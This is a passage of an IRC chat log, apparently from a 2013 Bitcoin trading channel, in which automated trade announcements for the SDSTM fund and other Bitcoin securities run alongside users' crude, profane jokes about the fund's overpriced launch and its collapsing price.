08:04:23 [HAVELOCK] [SDSTM] 175 @ 0.02 = 3.5 BTC [+] Jul 12 08:04:25 [HAVELOCK] [SDSTM] 140 @ 0.02 = 2.8 BTC [+] Jul 12 08:04:40 What the fuck is this shit anyway? Why are everyone buying so high? Jul 12 08:04:41 double price for some nobody's fund Jul 12 08:04:48 cuz they are retarded Jul 12 08:04:50 [HAVELOCK] [SDSTM] 200 @ 0.03 = 6 BTC [+] Jul 12 08:04:53 ... Jul 12 08:04:56 THE IPO WAS AT 0.001, not 0.01! Jul 12 08:05:02 It's 20 times the price. Jul 12 08:05:04 30 times Jul 12 08:05:05 w Jul 12 08:05:05 t Jul 12 08:05:06 f Jul 12 08:05:16 [HAVELOCK] [AM100] 136 @ 0.039998 = 5.4397 BTC [+] Jul 12 08:05:18 [HAVELOCK] [SDSTM] 151 @ 0.02 = 3.02 BTC [-] Jul 12 08:05:23 [HAVELOCK] [SDSTM] 200 @ 0.028 = 5.6 BTC [+] Jul 12 08:05:24 [HAVELOCK] [SDSTM] 50 @ 0.029 = 1.45 BTC [+] Jul 12 08:05:26 [HAVELOCK] [SDSTM] 50 @ 0.03 = 1.5 BTC [+] Jul 12 08:05:27 [HAVELOCK] [SDSTM] 50 @ 0.03 = 1.5 BTC [+] Jul 12 08:05:29 [HAVELOCK] [SDSTM] 100 @ 0.03 = 3 BTC [+] Jul 12 08:05:30 AND I MISSED BY HALF A SECOND BUYING 10000 SHARES FOR 10 BTC! Jul 12 08:05:31 [HAVELOCK] [AM100] 109 @ 0.039998 = 4.3598 BTC [+] Jul 12 08:05:35 [HAVELOCK] [SDSTM] 1 @ 0.025 BTC [-] Jul 12 08:05:37 CAUSE I WAS UNLOGGED! Jul 12 08:05:41 [HAVELOCK] [SDSTM] 7 @ 0.025 = 0.175 BTC [-] Jul 12 08:05:44 [HAVELOCK] [SDSTM] 50 @ 0.025 = 1.25 BTC [-] Jul 12 08:05:47 [HAVELOCK] [SDSTM] 1 @ 0.025 BTC [-] Jul 12 08:05:49 [HAVELOCK] [SDSTM] 14 @ 0.022 = 0.308 BTC [-] Jul 12 08:05:55 [HAVELOCK] [AM100] 1 @ 0.03999899 BTC [+] Jul 12 08:05:57 [HAVELOCK] [SDSTM] 30 @ 0.02 = 0.6 BTC [-] Jul 12 08:05:58 [HAVELOCK] [SDSTM] 4 @ 0.02 = 0.08 BTC [-] Jul 12 08:06:00 [HAVELOCK] [SDSTM] 50 @ 0.02 = 1 BTC [-] Jul 12 08:06:01 [HAVELOCK] [SDSTM] 10 @ 0.02 = 0.2 BTC [-] Jul 12 08:06:02 [HAVELOCK] [SDSTM] 100 @ 0.02 = 2 BTC [-] Jul 12 08:06:02 [HAVELOCK] [SDSTM] 1 @ 0.019 BTC [-] Jul 12 08:06:05 [HAVELOCK] [AM100] 5 @ 0.039998 = 0.2 BTC [-] Jul 12 08:06:07 [HAVELOCK] [SDSTM] 20 @ 0.019 = 0.38 BTC [-] Jul 12 08:06:15 [HAVELOCK] [SDSTM] 10 @ 0.018999 = 0.19 BTC [-] Jul 12 08:06:18 [HAVELOCK] [SDSTM] 2 @ 0.018999 = 0.038 BTC [-] Jul 12 08:06:19 I just lost thousands because of a security feature intended to protect those using a public computer. Jul 12 08:06:22 [HAVELOCK] [SDSTM] 40 @ 0.018999 = 0.76 BTC [-] Jul 12 08:06:23 [HAVELOCK] [SDSTM] 6 @ 0.019 = 0.114 BTC [+] Jul 12 08:06:29 [HAVELOCK] [SDSTM] 7 @ 0.019 = 0.133 BTC [+] Jul 12 08:06:30 [HAVELOCK] [SDSTM] 4 @ 0.019 = 0.076 BTC [+] Jul 12 08:06:33 Who the fuck use public computers to check financial stuff? Jul 12 08:06:34 [HAVELOCK] [SDSTM] 250 @ 0.010001 = 2.5003 BTC [-] Jul 12 08:06:36 [HAVELOCK] [SDSTM] 150 @ 0.019 = 2.85 BTC [+] Jul 12 08:06:45 [HAVELOCK] [SDSTM] 500 @ 0.019 = 9.5 BTC [+] Jul 12 08:06:45 i dont think it's supposed to be live at all Jul 12 08:06:46 [HAVELOCK] [AM100] 86 @ 0.039998 = 3.4398 BTC [-] Jul 12 08:06:46 [HAVELOCK] [AM100] 34 @ 0.03999899 = 1.36 BTC [+] Jul 12 08:06:49 [HAVELOCK] [SDSTM] 1 @ 0.019 BTC [+] Jul 12 08:06:54 [HAVELOCK] [SDSTM] 117 @ 0.019 = 2.223 BTC [+] Jul 12 08:06:56 [HAVELOCK] [SDSTM] 50 @ 0.02 = 1 BTC [+] Jul 12 08:06:57 [HAVELOCK] [SDSTM] 33 @ 0.0239 = 0.7887 BTC [+] Jul 12 08:06:59 [HAVELOCK] [AM100] 69 @ 0.03999899 = 2.7599 BTC [+] Jul 12 08:07:04 ;;ticker Jul 12 08:07:05 MtGox BTCUSD ticker | Best bid: 96.11111, Best ask: 96.13100, Bid-ask spread: 0.01989, Last trade: 97.49990, 24 hour volume: 45082.75895114, 24 hour low: 85.00901, 24 hour high: 97.84000, 24 hour vwap: 90.44967 Jul 12 08:07:08 whoa Jul 12 08:07:08 [HAVELOCK] [SDSTM] 5 @ 0.019 = 0.095 BTC [-] Jul 12 08:07:09 [HAVELOCK] [SDSTM] 20 @ 0.0239 = 0.478 BTC [+] Jul 12 08:07:12 [HAVELOCK] [SDSTM] 47 @ 0.0239 = 1.1233 BTC [+] Jul 12 08:07:14 [HAVELOCK] [SDSTM] 3 @ 0.0239 = 0.0717 BTC [+] Jul 12 08:07:16 [HAVELOCK] [SDSTM] 40 @ 0.0239 = 0.956 BTC [+] Jul 12 08:07:27 [HAVELOCK] [SDSTM] 1 @ 0.022 BTC [-] Jul 12 08:07:29 [HAVELOCK] [SDSTM] 100 @ 0.022 = 2.2 BTC [-] Jul 12 08:07:30 world just got all retarded Jul 12 08:07:42 Yes indeed. Jul 12 08:07:43 [HAVELOCK] [SDSTM] 17 @ 0.022 = 0.374 BTC [-] Jul 12 08:07:50 [HAVELOCK] [AM100] 2 @ 0.03999899 = 0.08 BTC [+] Jul 12 08:07:52 [HAVELOCK] [SDSTM] 10 @ 0.022 = 0.22 BTC [-] Jul 12 08:07:54 [HAVELOCK] [SDSTM] 7 @ 0.022 = 0.154 BTC [-] Jul 12 08:07:57 wondering if I should call James Jul 12 08:07:57 [HAVELOCK] [SDSTM] 22 @ 0.022 = 0.484 BTC [-] Jul 12 08:07:58 [HAVELOCK] [SDSTM] 13 @ 0.022 = 0.286 BTC [-] Jul 12 08:08:00 Especially since it's a fund and will pay dividends on 100 BTC of other Bitcoin stocks Jul 12 08:08:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.042001 = 2.1001 BTC [-] Jul 12 08:08:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.042001 = 0.84 BTC [-] Jul 12 08:08:05 [BTCTC] [TAT.ASICMINER] 26 @ 0.042 = 1.092 BTC [-] Jul 12 08:08:06 [BTCTC] [TAT.ASICMINER] 15 @ 0.042 = 0.63 BTC [-] Jul 12 08:08:10 [HAVELOCK] [SDSTM] 90 @ 0.022 = 1.98 BTC [-] Jul 12 08:08:22 heh Jul 12 08:08:23 [HAVELOCK] [SDSTM] 1 @ 0.022 BTC [-] Jul 12 08:08:25 And it's now valued at 2000 BTC for some reason Jul 12 08:08:29 [HAVELOCK] [SDSTM] 5 @ 0.02199 = 0.11 BTC [-] Jul 12 08:08:36 [HAVELOCK] [SDSTM] 9 @ 0.02199 = 0.1979 BTC [-] Jul 12 08:08:39 Even if the owner IPOed for 100 BTC and will be holding that... Jul 12 08:08:43 the 2011 that never ends. Jul 12 08:08:56 mircea, indeed it never ends. Jul 12 08:08:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.04181 = 0.2509 BTC [-] Jul 12 08:08:58 [HAVELOCK] [SDSTM] 100 @ 0.022 = 2.2 BTC [+] Jul 12 08:08:59 [BTCTC] [TAT.ASICMINER] 20 @ 0.0418 = 0.836 BTC [-] Jul 12 08:09:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.041701 = 0.1251 BTC [-] Jul 12 08:09:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.041626 = 0.4995 BTC [-] Jul 12 08:09:05 [BTCTC] [TAT.ASICMINER] 15 @ 0.041622 = 0.6243 BTC [-] Jul 12 08:09:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.04155 = 0.4155 BTC [-] Jul 12 08:09:09 [HAVELOCK] [SDSTM] 35 @ 0.022 = 0.77 BTC [+] Jul 12 08:09:16 [HAVELOCK] [AM100] 33 @ 0.039999 = 1.32 BTC [+] Jul 12 08:09:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.0415 = 0.2075 BTC [-] Jul 12 08:09:19 And it makes my pockets happy. Jul 12 08:09:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.0415 = 0.166 BTC [-] Jul 12 08:09:23 [HAVELOCK] [SDSTM] 135 @ 0.022 = 2.97 BTC [+] Jul 12 08:09:27 [HAVELOCK] [SDSTM] 126 @ 0.022 = 2.772 BTC [+] Jul 12 08:09:29 If only I wasn't disconnected. Missed a good chance on this one. Jul 12 08:09:30 [HAVELOCK] [SDSTM] 1 @ 0.022 BTC [+] Jul 12 08:09:42 [BTCTC] [TAT.ASICMINER] 30 @ 0.0413 = 1.239 BTC [-] Jul 12 08:09:56 [BTCTC] [TAT.ASICMINER] 23 @ 0.04125 = 0.9488 BTC [-] Jul 12 08:10:06 [HAVELOCK] [SDSTM] 15 @ 0.0219 = 0.3285 BTC [-] Jul 12 08:10:15 [BTCTC] [TAT.ASICMINER] 14 @ 0.041201 = 0.5768 BTC [-] Jul 12 08:10:17 [HAVELOCK] [SDSTM] 4 @ 0.0219 = 0.0876 BTC [-] Jul 12 08:10:21 [HAVELOCK] [SDSTM] 5 @ 0.0219 = 0.1095 BTC [-] Jul 12 08:10:29 [HAVELOCK] [SDSTM] 80 @ 0.0219 = 1.752 BTC [-] Jul 12 08:10:37 [BTCTC] [TAT.ASICMINER] 90 @ 0.0412 = 3.708 BTC [-] Jul 12 08:10:40 [HAVELOCK] [SDSTM] 100 @ 0.02 = 2 BTC [-] Jul 12 08:10:50 [HAVELOCK] [SDSTM] 200 @ 0.0195 = 3.9 BTC [-] Jul 12 08:10:51 [BTCTC] [TAT.ASICMINER] 6 @ 0.041129 = 0.2468 BTC [-] Jul 12 08:10:53 [HAVELOCK] [SDSTM] 1000 @ 0.0195 = 19.5 BTC [-] Jul 12 08:11:09 [HAVELOCK] [SDSTM] 3 @ 0.0195 = 0.0585 BTC [-] Jul 12 08:11:11 [HAVELOCK] [SDSTM] 896 @ 0.0195 = 17.472 BTC [-] Jul 12 08:11:20 [HAVELOCK] [SDSTM] 12 @ 0.0195 = 0.234 BTC [-] Jul 12 08:11:36 [HAVELOCK] [SDSTM] 1000 @ 0.0195 = 19.5 BTC [-] Jul 12 08:11:51 [HAVELOCK] [SDSTM] 4 @ 0.0194 = 0.0776 BTC [-] Jul 12 08:11:57 "Sandstorm will use sophisticated investment strategies to ensure that the goals are met and the company grows into a mature entity within the BTC community." Jul 12 08:12:09 "The creator of Sandstorm has been creating wealth through BTC related activities for a long time. " Jul 12 08:12:09 [HAVELOCK] [SDSTM] 400 @ 0.0194 = 7.76 BTC [-] Jul 12 08:12:10 [HAVELOCK] [SDSTM] 100 @ 0.0195 = 1.95 BTC [+] Jul 12 08:12:11 [HAVELOCK] [SDSTM] 1789 @ 0.0195 = 34.8855 BTC [+] Jul 12 08:12:12 [HAVELOCK] [SDSTM] 500 @ 0.0195 = 9.75 BTC [+] Jul 12 08:12:15 [HAVELOCK] [SDSTM] 20 @ 0.0195 = 0.39 BTC [+] Jul 12 08:12:27 [HAVELOCK] [SDSTM] 580 @ 0.0195 = 11.31 BTC [+] Jul 12 08:12:35 "Sandstorm plans to invest BTC in the smartest way possible to maximize profits to investors. Profits will be used to rewards shareholders and grow the company." Jul 12 08:12:39 [HAVELOCK] [SDSTM] 999 @ 0.018 = 17.982 BTC [-] Jul 12 08:12:44 [HAVELOCK] [SDSTM] 10 @ 0.0195 = 0.195 BTC [+] Jul 12 08:12:53 [HAVELOCK] [SDSTM] 13 @ 0.021 = 0.273 BTC [+] Jul 12 08:13:06 [HAVELOCK] [SDSTM] 1 @ 0.0194 BTC [-] Jul 12 08:13:26 "It is aimed at people within the BTC community searching for a relatively low risk investment with high rewards." Jul 12 08:13:41 [BTCTC] [BASIC-MINING] 3 @ 0.4018 = 1.2054 BTC [+] Jul 12 08:13:43 [HAVELOCK] [SDSTM] 1 @ 0.021 BTC [+] Jul 12 08:13:44 [HAVELOCK] [SDSTM] 3 @ 0.0215 = 0.0645 BTC [+] Jul 12 08:13:46 [HAVELOCK] [SDSTM] 1904 @ 0.020001 = 38.0819 BTC [-] Jul 12 08:13:51 [HAVELOCK] [AM100] 3 @ 0.04 = 0.12 BTC [+] Jul 12 08:14:05 ready for his spreadsheet? Jul 12 08:14:07 https://docs.google.com/spreadsheet/ccc?key=0AhkfI_u94nYydFRIaTlBNE14aHBZNzIxRlBLWlhzTlE&usp=sharing Jul 12 08:14:12 Welcome to Google Docs Jul 12 08:14:31 [HAVELOCK] [SDSTM] 26 @ 0.021 = 0.546 BTC [+] Jul 12 08:14:36 [HAVELOCK] [SDSTM] 14 @ 0.021 = 0.294 BTC [+] Jul 12 08:14:37 [HAVELOCK] [SDSTM] 1 @ 0.021 BTC [+] Jul 12 08:14:44 He has 900'000 more coming... Jul 12 08:14:59 [HAVELOCK] [SDSTM] 5 @ 0.021 = 0.105 BTC [+] Jul 12 08:15:08 [HAVELOCK] [SDSTM] 1 @ 0.021 BTC [+] Jul 12 08:15:10 [HAVELOCK] [SDSTM] 19 @ 0.021 = 0.399 BTC [+] Jul 12 08:15:20 [HAVELOCK] [SDSTM] 6 @ 0.0215 = 0.129 BTC [+] Jul 12 08:15:28 [BTCTC] [GSDPT] 5 @ 0.002199 = 0.011 BTC [-] Jul 12 08:15:36 [HAVELOCK] [SDSTM] 6 @ 0.0215 = 0.129 BTC [+] Jul 12 08:15:44 [HAVELOCK] [SDSTM] 76 @ 0.021 = 1.596 BTC [-] Jul 12 08:15:45 [HAVELOCK] [SDSTM] 25 @ 0.021 = 0.525 BTC [-] Jul 12 08:15:47 [HAVELOCK] [SDSTM] 200 @ 0.021 = 4.2 BTC [-] Jul 12 08:15:48 [HAVELOCK] [AM100] 7 @ 0.03999901 = 0.28 BTC [-] Jul 12 08:15:49 [HAVELOCK] [AM100] 43 @ 0.039999 = 1.72 BTC [-] Jul 12 08:16:17 [HAVELOCK] [SDSTM] 5 @ 0.021 = 0.105 BTC [-] Jul 12 08:16:27 [HAVELOCK] [AM100] 24 @ 0.039999 = 0.96 BTC [-] Jul 12 08:16:29 [BTCTC] [BITVPS] 1 @ 0.00203 BTC [+] Jul 12 08:16:39 [BTCTC] [BASIC-MINING] 1 @ 0.401701 BTC [-] Jul 12 08:16:42 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 12 08:16:52 [BTCTC] [DMS.MINING] 1 @ 0.01475 BTC [-] Jul 12 08:16:57 [HAVELOCK] [SDSTM] 51 @ 0.02 = 1.02 BTC [-] Jul 12 08:17:09 [HAVELOCK] [SDSTM] 45 @ 0.02 = 0.9 BTC [-] Jul 12 08:17:10 [HAVELOCK] [SDSTM] 5 @ 0.021 = 0.105 BTC [+] Jul 12 08:17:15 okay he did announce 1am as IPO time Jul 12 08:17:17 lol Jul 12 08:17:26 [HAVELOCK] [SDSTM] 50 @ 0.01975 = 0.9875 BTC [-] Jul 12 08:17:59 [HAVELOCK] [SDSTM] 100 @ 0.019 = 1.9 BTC [-] Jul 12 08:18:00 [HAVELOCK] [SDSTM] 50 @ 0.01975 = 0.9875 BTC [+] Jul 12 08:18:05 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 12 08:18:05 wow btc hit almost 100 Jul 12 08:18:13 [HAVELOCK] [SDSTM] 24 @ 0.019 = 0.456 BTC [-] Jul 12 08:18:14 ;;bc,nethash Jul 12 08:18:15 Error: "bc,nethash" is not a valid command. Jul 12 08:18:15 [HAVELOCK] [SDSTM] 1000 @ 0.019 = 19 BTC [-] Jul 12 08:18:20 ;;nethash Jul 12 08:18:21 224488.525058 Jul 12 08:18:26 oh thx tat Jul 12 08:18:29 ;;bcstats Jul 12 08:18:31 Current Blocks: 246167 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 1800 blocks | Next Difficulty In About: 1 week, 2 days, 12 hours, 34 minutes, and 17 seconds | Next Difficulty Estimate: 32730854.0891 | Estimated Percent Change: 25.10419 Jul 12 08:18:31 np Jul 12 08:18:42 [HAVELOCK] [SDSTM] 1 @ 0.0197 BTC [+] Jul 12 08:18:45 [MPEX] [S.DICE] 500 @ 0.002051 = 1.0255 BTC [-] Jul 12 08:18:47 [MPEX] [S.DICE] 200 @ 0.00205 = 0.41 BTC [-] Jul 12 08:18:48 [HAVELOCK] [SDSTM] 30 @ 0.019 = 0.57 BTC [-] Jul 12 08:18:53 thats about +100Th in just over a month O.O Jul 12 08:19:04 [MPEX] [S.DICE] 1110 @ 0.00200025 = 2.2203 BTC [-] Jul 12 08:19:05 [MPEX] [S.DICE] 4000 @ 0.00200021 = 8.0008 BTC [-] Jul 12 08:19:06 [HAVELOCK] [SDSTM] 846 @ 0.019 = 16.074 BTC [-] Jul 12 08:19:07 [HAVELOCK] [SDSTM] 50 @ 0.018 = 0.9 BTC [-] Jul 12 08:19:08 [HAVELOCK] [SDSTM] 5 @ 0.0166 = 0.083 BTC [-] Jul 12 08:19:17 [HAVELOCK] [SDSTM] 100 @ 0.0165 = 1.65 BTC [-] Jul 12 08:19:20 [HAVELOCK] [SDSTM] 50 @ 0.0166 = 0.83 BTC [+] Jul 12 08:19:22 [MPEX] [S.DICE] 2300 @ 0.0020001 = 4.6002 BTC [-] Jul 12 08:19:23 [MPEX] [S.DICE] 3595 @ 0.00200005 = 7.1902 BTC [-] Jul 12 08:19:27 [HAVELOCK] [SDSTM] 49 @ 0.0166 = 0.8134 BTC [+] Jul 12 08:19:33 it was at 200,000 like 2 days ago Jul 12 08:19:38 [MPEX] [S.DICE] 5387 @ 0.002 = 10.774 BTC [-] Jul 12 08:19:41 [HAVELOCK] [SDSTM] 50 @ 0.0166 = 0.83 BTC [+] Jul 12 08:19:45 [HAVELOCK] [SDSTM] 50 @ 0.0166 = 0.83 BTC [+] Jul 12 08:19:46 [HAVELOCK] [SDSTM] 50 @ 0.0175 = 0.875 BTC [+] Jul 12 08:19:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [+] Jul 12 08:19:55 [HAVELOCK] [AM100] 12 @ 0.039999 = 0.48 BTC [-] Jul 12 08:20:05 yeah, was just looking at: http://bitcoin.sipa.be/ Jul 12 08:20:09 [HAVELOCK] [SDSTM] 50 @ 0.0175 = 0.875 BTC [+] Jul 12 08:20:13 [HAVELOCK] [VTX] 1 @ 0.86 BTC [+] Jul 12 08:20:15 [HAVELOCK] [AM100] 95 @ 0.04 = 3.8 BTC [+] Jul 12 08:20:32 [HAVELOCK] [SDSTM] 9 @ 0.0175 = 0.1575 BTC [+] Jul 12 08:20:35 [HAVELOCK] [AM100] 23 @ 0.04 = 0.92 BTC [+] Jul 12 08:20:37 [HAVELOCK] [SDSTM] 41 @ 0.0175 = 0.7175 BTC [+] Jul 12 08:20:38 [HAVELOCK] [SDSTM] 2 @ 0.0175 = 0.035 BTC [+] Jul 12 08:20:56 [HAVELOCK] [SDSTM] 60 @ 0.01665 = 0.999 BTC [-] Jul 12 08:20:58 [HAVELOCK] [SDSTM] 140 @ 0.0165 = 2.31 BTC [-] Jul 12 08:21:17 [HAVELOCK] [SDSTM] 60 @ 0.0165 = 0.99 BTC [-] Jul 12 08:21:23 [HAVELOCK] [AM100] 55 @ 0.040499 = 2.2274 BTC [+] Jul 12 08:21:27 [HAVELOCK] [SDSTM] 3 @ 0.0165 = 0.0495 BTC [-] Jul 12 08:21:29 [HAVELOCK] [SDSTM] 30 @ 0.0165 = 0.495 BTC [-] Jul 12 08:21:34 [HAVELOCK] [SDSTM] 200 @ 0.016 = 3.2 BTC [-] Jul 12 08:21:36 [HAVELOCK] [SDSTM] 14 @ 0.016 = 0.224 BTC [-] Jul 12 08:21:40 [HAVELOCK] [SDSTM] 4 @ 0.016 = 0.064 BTC [-] Jul 12 08:21:43 timberrrrr Jul 12 08:21:46 [HAVELOCK] [SDSTM] 100 @ 0.0156 = 1.56 BTC [-] Jul 12 08:21:48 [HAVELOCK] [SDSTM] 8 @ 0.016 = 0.128 BTC [+] Jul 12 08:21:54 [HAVELOCK] [SDSTM] 100 @ 0.0156 = 1.56 BTC [-] Jul 12 08:22:06 [HAVELOCK] [AM100] 12 @ 0.040499 = 0.486 BTC [+] Jul 12 08:22:10 [HAVELOCK] [AM100] 32 @ 0.040499 = 1.296 BTC [+] Jul 12 08:22:12 [HAVELOCK] [AM100] 3 @ 0.0405 = 0.1215 BTC [+] Jul 12 08:22:16 [HAVELOCK] [SDSTM] 74 @ 0.016 = 1.184 BTC [+] Jul 12 08:22:32 [HAVELOCK] [SDSTM] 200 @ 0.016 = 3.2 BTC [+] Jul 12 08:22:44 [HAVELOCK] [SDSTM] 226 @ 0.016 = 3.616 BTC [+] Jul 12 08:23:09 [HAVELOCK] [SDSTM] 301 @ 0.0159 = 4.7859 BTC [-] Jul 12 08:23:34 [BTCTC] [RSM] 2 @ 0.013 = 0.026 BTC [+] Jul 12 08:23:35 [HAVELOCK] [SDSTM] 70 @ 0.0159 = 1.113 BTC [-] Jul 12 08:24:05 [HAVELOCK] [AM100] 36 @ 0.040497 = 1.4579 BTC [-] Jul 12 08:24:06 [HAVELOCK] [AM100] 36 @ 0.040498 = 1.4579 BTC [+] Jul 12 08:24:08 [HAVELOCK] [AM100] 3 @ 0.0404985 = 0.1215 BTC [+] Jul 12 08:24:09 [HAVELOCK] [AM100] 25 @ 0.0405 = 1.0125 BTC [+] Jul 12 08:24:10 [HAVELOCK] [SDSTM] 2 @ 0.0158 = 0.0316 BTC [-] Jul 12 08:24:14 [BTCTC] [TAT.ASICMINER] 8 @ 0.042 = 0.336 BTC [+] Jul 12 08:24:40 [HAVELOCK] [SDSTM] 1 @ 0.0159 BTC [+] Jul 12 08:24:54 [HAVELOCK] [SDSTM] 7 @ 0.0158 = 0.1106 BTC [-] Jul 12 08:24:56 [HAVELOCK] [SDSTM] 5 @ 0.0155 = 0.0775 BTC [-] Jul 12 08:24:57 [HAVELOCK] [SDSTM] 1 @ 0.0154 BTC [-] Jul 12 08:24:58 [HAVELOCK] [SDSTM] 4 @ 0.015 = 0.06 BTC [-] Jul 12 08:24:58 [HAVELOCK] [SDSTM] 30 @ 0.015 = 0.45 BTC [-] Jul 12 08:25:22 [HAVELOCK] [SDSTM] 3 @ 0.0112 = 0.0336 BTC [-] Jul 12 08:25:25 [HAVELOCK] [SDSTM] 1 @ 0.0112 BTC [-] Jul 12 08:25:31 [HAVELOCK] [SDSTM] 14 @ 0.0112 = 0.1568 BTC [-] Jul 12 08:25:35 [BTCTC] [DMS.MINING] 7 @ 0.01475 = 0.1033 BTC [-] Jul 12 08:25:41 [HAVELOCK] [SDSTM] 5 @ 0.0111 = 0.0555 BTC [-] Jul 12 08:25:42 [HAVELOCK] [SDSTM] 9 @ 0.011 = 0.099 BTC [-] Jul 12 08:25:44 [HAVELOCK] [SDSTM] 400 @ 0.011 = 4.4 BTC [-] Jul 12 08:25:45 [HAVELOCK] [SDSTM] 130 @ 0.01 = 1.3 BTC [-] Jul 12 08:25:46 [HAVELOCK] [SDSTM] 35 @ 0.01 = 0.35 BTC [-] Jul 12 08:25:46 [HAVELOCK] [SDSTM] 10 @ 0.01 = 0.1 BTC [-] Jul 12 08:25:48 [HAVELOCK] [SDSTM] 17 @ 0.01 = 0.17 BTC [-] Jul 12 08:25:48 [HAVELOCK] [SDSTM] 50 @ 0.01 = 0.5 BTC [-] Jul 12 08:25:50 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC [-] Jul 12 08:26:04 [HAVELOCK] [SDSTM] 4 @ 0.01 = 0.04 BTC [-] Jul 12 08:26:09 [HAVELOCK] [SDSTM] 4 @ 0.01 = 0.04 BTC [-] Jul 12 08:26:24 [HAVELOCK] [SDSTM] 20 @ 0.005 = 0.1 BTC [-] Jul 12 08:26:26 [HAVELOCK] [SDSTM] 208 @ 0.00333 = 0.6926 BTC [-] Jul 12 08:26:45 [HAVELOCK] [SDSTM] 4 @ 0.0034 = 0.0136 BTC [+] Jul 12 08:26:45 [HAVELOCK] [SDSTM] 5 @ 0.00333 = 0.0167 BTC [-] Jul 12 08:26:55 [HAVELOCK] [AM100] 3 @ 0.040011 = 0.12 BTC [-] Jul 12 08:26:57 [HAVELOCK] [AM100] 22 @ 0.04001 = 0.8802 BTC [-] Jul 12 08:27:06 [BTCTC] [DMS.MINING] 1 @ 0.01475 BTC [-] Jul 12 08:27:12 [HAVELOCK] [SDSTM] 5 @ 0.006 = 0.03 BTC [+] Jul 12 08:27:26 [HAVELOCK] [SDSTM] 5 @ 0.005 = 0.025 BTC [-] Jul 12 08:27:28 [HAVELOCK] [SDSTM] 95 @ 0.00333 = 0.3164 BTC [-] Jul 12 08:27:44 [HAVELOCK] [HIM] 2 @ 0.275001 = 0.55 BTC [-] Jul 12 08:28:06 [HAVELOCK] [SDSTM] 1 @ 0.008 BTC [+] Jul 12 08:28:09 [HAVELOCK] [SDICE] 1 @ 0.18230101 BTC [-] Jul 12 08:28:23 [HAVELOCK] [HIM] 50 @ 0.275 = 13.75 BTC [-] Jul 12 08:28:27 [HAVELOCK] [SDSTM] 100 @ 0.007999 = 0.7999 BTC [-] Jul 12 08:28:55 [HAVELOCK] [SDICE] 9 @ 0.1823 = 1.6407 BTC [-] Jul 12 08:29:04 [HAVELOCK] [SDSTM] 43 @ 0.0078 = 0.3354 BTC [-] Jul 12 08:29:38 [HAVELOCK] [SDSTM] 120 @ 0.00779 = 0.9348 BTC [-] Jul 12 08:29:40 [HAVELOCK] [SDSTM] 80 @ 0.0078 = 0.624 BTC [+] Jul 12 08:29:41 [HAVELOCK] [AM100] 10 @ 0.040449 = 0.4045 BTC [+] Jul 12 08:30:02 [HAVELOCK] [SDSTM] 1 @ 0.0078 BTC [+] Jul 12 08:30:21 [HAVELOCK] [SDSTM] 50 @ 0.0078 = 0.39 BTC [+] Jul 12 08:30:31 [HAVELOCK] [SDSTM] 20 @ 0.00779 = 0.1558 BTC [-] Jul 12 08:30:36 [HAVELOCK] [AM100] 5 @ 0.0401 = 0.2005 BTC [-] Jul 12 08:30:44 [HAVELOCK] [SDSTM] 50 @ 0.00779 = 0.3895 BTC [-] Jul 12 08:30:45 [HAVELOCK] [SDSTM] 1 @ 0.00605 BTC [-] Jul 12 08:30:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004464 BTC [-] Jul 12 08:30:55 [HAVELOCK] [SDSTM] 10 @ 0.00779 = 0.0779 BTC [+] Jul 12 08:31:13 [HAVELOCK] [SDSTM] 425 @ 0.0078 = 3.315 BTC [+] Jul 12 08:32:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [+] Jul 12 08:32:42 [HAVELOCK] [SDSTM] 100 @ 0.00798 = 0.798 BTC [+] Jul 12 08:32:59 [BTCTC] [TAT.ASICMINER] 63 @ 0.042997 = 2.7088 BTC [+] Jul 12 08:33:05 [HAVELOCK] [SDSTM] 75 @ 0.00798 = 0.5985 BTC [+] Jul 12 08:33:56 [HAVELOCK] [SDSTM] 325 @ 0.00798 = 2.5935 BTC [+] Jul 12 08:34:12 [HAVELOCK] [SDSTM] 112 @ 0.00798 = 0.8938 BTC [+] Jul 12 08:34:13 [HAVELOCK] [SDSTM] 5 @ 0.00779 = 0.039 BTC [-] Jul 12 08:34:25 [HAVELOCK] [SDSTM] 183 @ 0.00779 = 1.4256 BTC [-] Jul 12 08:34:38 only 779% Jul 12 08:34:39 wtf Jul 12 08:35:02 [HAVELOCK] [SDSTM] 300 @ 0.00798 = 2.394 BTC [+] Jul 12 08:35:04 [HAVELOCK] [SDSTM] 200 @ 0.00798 = 1.596 BTC [+] Jul 12 08:35:06 [HAVELOCK] [VTX] 1 @ 0.83 BTC [-] Jul 12 08:35:49 [HAVELOCK] [SDSTM] 1 @ 0.007999 BTC [+] Jul 12 08:35:59 [HAVELOCK] [SDSTM] 97 @ 0.00798 = 0.7741 BTC [-] Jul 12 08:37:00 [HAVELOCK] [HIM] 2 @ 0.272 = 0.544 BTC [-] Jul 12 08:37:02 [HAVELOCK] [SDSTM] 3 @ 0.00798 = 0.0239 BTC [-] Jul 12 08:37:14 [HAVELOCK] [HIM] 1 @ 0.271 BTC [-] Jul 12 08:37:25 [HAVELOCK] [HIM] 7 @ 0.265 = 1.855 BTC [-] Jul 12 08:37:49 [HAVELOCK] [SDSTM] 97 @ 0.00798 = 0.7741 BTC [-] Jul 12 08:37:51 [HAVELOCK] [SDSTM] 3 @ 0.0078 = 0.0234 BTC [-] Jul 12 08:38:05 [HAVELOCK] [SDSTM] 20 @ 0.007999 = 0.16 BTC [+] Jul 12 08:38:15 [HAVELOCK] [SDSTM] 100 @ 0.007999 = 0.7999 BTC [+] Jul 12 08:38:25 [HAVELOCK] [SDSTM] 344 @ 0.007999 = 2.7517 BTC [+] Jul 12 08:38:45 [HAVELOCK] [SDSTM] 6 @ 0.007999 = 0.048 BTC [+] Jul 12 08:39:27 [HAVELOCK] [AM100] 3 @ 0.0403 = 0.1209 BTC [+] Jul 12 08:39:29 [HAVELOCK] [AM100] 3 @ 0.040499 = 0.1215 BTC 